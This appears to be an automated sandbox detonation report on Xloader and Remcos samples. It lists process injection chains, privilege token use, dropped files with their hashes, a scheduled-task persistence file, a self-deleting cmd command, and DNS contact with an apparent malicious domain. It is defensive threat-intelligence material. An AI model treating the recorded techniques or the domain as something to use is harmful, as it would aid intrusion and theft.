Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3032 set thread context of 1192 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 3032 set thread context of 1192 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2828 set thread context of 1192 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
memory/1732-0-0x000000007419E000-0x000000007419F000-memory.dmp
memory/1732-1-0x0000000000D90000-0x0000000000E66000-memory.dmp
memory/1732-2-0x0000000074190000-0x000000007487E000-memory.dmp
memory/1732-3-0x00000000005F0000-0x00000000005F8000-memory.dmp
memory/1732-4-0x000000007419E000-0x000000007419F000-memory.dmp
memory/1732-5-0x0000000074190000-0x000000007487E000-memory.dmp
memory/1732-6-0x0000000004D60000-0x0000000004DE8000-memory.dmp
memory/1732-7-0x0000000000D50000-0x0000000000D8A000-memory.dmp
memory/3032-8-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3032-14-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3032-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3032-10-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1732-15-0x0000000074190000-0x000000007487E000-memory.dmp
memory/3032-16-0x0000000000840000-0x0000000000B43000-memory.dmp
memory/3032-18-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3032-19-0x00000000000C0000-0x00000000000D0000-memory.dmp
memory/1192-20-0x0000000006370000-0x00000000064BB000-memory.dmp
memory/3032-23-0x0000000000240000-0x0000000000250000-memory.dmp
memory/1192-24-0x00000000064C0000-0x0000000006665000-memory.dmp
memory/3032-22-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1192-25-0x0000000006370000-0x00000000064BB000-memory.dmp
memory/2828-27-0x00000000007F0000-0x00000000007FE000-memory.dmp
memory/2828-26-0x00000000007F0000-0x00000000007FE000-memory.dmp
memory/2828-29-0x00000000007F0000-0x00000000007FE000-memory.dmp
memory/2828-30-0x0000000000090000-0x00000000000B9000-memory.dmp
memory/1192-31-0x00000000064C0000-0x0000000006665000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
146s
Max time network
123s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2392 set thread context of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2572 set thread context of 1212 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2540 set thread context of 1212 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\NAPSTAT.EXE
"C:\Windows\SysWOW64\NAPSTAT.EXE"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
memory/2392-0-0x0000000073EAE000-0x0000000073EAF000-memory.dmp
memory/2392-1-0x0000000000980000-0x0000000000A86000-memory.dmp
memory/2392-2-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2392-3-0x0000000000210000-0x0000000000218000-memory.dmp
memory/2392-4-0x0000000073EAE000-0x0000000073EAF000-memory.dmp
memory/2392-5-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2392-6-0x0000000005010000-0x000000000509C000-memory.dmp
memory/2392-7-0x0000000000630000-0x000000000066A000-memory.dmp
memory/2572-8-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2572-13-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-9-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2392-14-0x0000000073EA0000-0x000000007458E000-memory.dmp
memory/2572-15-0x00000000009E0000-0x0000000000CE3000-memory.dmp
memory/2572-17-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2572-18-0x0000000000090000-0x00000000000A0000-memory.dmp
memory/1212-19-0x0000000006800000-0x0000000006905000-memory.dmp
memory/2540-21-0x0000000000EC0000-0x0000000000F06000-memory.dmp
memory/2540-20-0x0000000000EC0000-0x0000000000F06000-memory.dmp
memory/2540-22-0x0000000000080000-0x00000000000A8000-memory.dmp
memory/1212-23-0x0000000006800000-0x0000000006905000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
13s
Max time network
19s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2328 set thread context of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2328 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
Files
memory/2268-0-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-2-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-3-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-4-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2268-5-0x0000000000470000-0x0000000000512000-memory.dmp
memory/2268-6-0x0000000000400000-0x0000000000430000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
96s
Max time network
144s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/1488-2-0x0000000002B80000-0x0000000002B93000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Remcos
Remcos family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\openvpn-gui.job | C:\Windows\SysWOW64\cmd.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\632cfc71bd4734fdd98e48166a52fbc4a48d43640f3375fd882dd374479bffb1.doc" /o ""
C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe
"C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.160:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 160.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.192.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.23.210.149:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 149.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
| US | 8.8.8.8:53 | elninotronics.com | udp |
Files
memory/3076-1-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp
memory/3076-0-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-4-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp
memory/3076-9-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-8-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-7-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-6-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-11-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-10-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-12-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-13-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp
memory/3076-14-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-16-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-21-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-23-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-22-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-20-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-19-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-18-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-17-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-15-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp
memory/3076-57-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-61-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-51-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\churner.dll
| MD5 | f7092de5f32c0df837fa7f947a3424af |
| SHA1 | acc8123288c20b1c4ae67ef4f2b4028d9153239c |
| SHA256 | 97adb1700858b74f456f5cf681b0421d0be50e3aed1adea3d1b9694295723700 |
| SHA512 | f10d5c86a85d3d8be56fb5066fddd0474c71a36f280f475f4e3d6cc939718647f493665c4c9ea00c3d60f22f172019e2082c7090b54f730d02701f1cb3d34164 |
memory/3076-75-0x0000014A476C0000-0x0000014A476C4000-memory.dmp
memory/3076-76-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-77-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp
memory/3076-78-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-79-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-80-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | ecc057ec79b066d9736d95015d7797dc |
| SHA1 | 926385ce88d23c5ac765035582388d0f575f1967 |
| SHA256 | 2efed6e1976f9bd3da68b365733f6a9825c86027fe7294b04cda7fb3161eb231 |
| SHA512 | 8eb5977d0b7a5e00549616d12e33851309ff353f837ff17c1cedbff17fb1fa8af18e9bab3a11fd14368263e3e392d126fa5c871b5d493cf8744ddedc2f57044c |
memory/3076-89-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-90-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
memory/3076-91-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp
C:\Users\Admin\AppData\Local\Adobe\Color\openvpn-gui.exe
| MD5 | 87390e37e36622b054d4bdcbb7997b6c |
| SHA1 | 4d591f310318fd95a95109d7965a79729b65c69e |
| SHA256 | 5f067f86ad0f88a629263162810bf5052f5ebbd97d5d0de936311bb44c9f35e7 |
| SHA512 | 285abb19138a5dd109dfc0e76f4a4f96b3731a84ca9229e6ef9315513b052fd7ad7b2e0392ac9becbf4caf2c9bbdbd87f5b66486fb2ae1385c1fbe6e1ed643dd |
C:\Users\Admin\AppData\Local\Adobe\Color\cmpbk32.dll
| MD5 | 67389b7169dbec76a9a11d8570896f4f |
| SHA1 | b9083a4f76911d2ab03b1e3fa2eaa7518e2e8928 |
| SHA256 | d65ea87824e597d3025d6beb12cc3816a98fb34125628120abf7dc3fc73d0e39 |
| SHA512 | 3a095f630d3c68e0af6ae0f4c469db33c90eb537edefd83f1b054241ed43ed2afe1a2c34a693cd81388f8edae693890f2bb6b9b81a1f9adca841eb05b8abb342 |
memory/3004-99-0x00000000015D0000-0x00000000019D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD41C1.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/3004-218-0x00000000015D0000-0x00000000019D1000-memory.dmp
memory/4372-219-0x0000000004850000-0x00000000048DA000-memory.dmp
memory/1564-221-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1564-226-0x0000000000400000-0x0000000000478000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
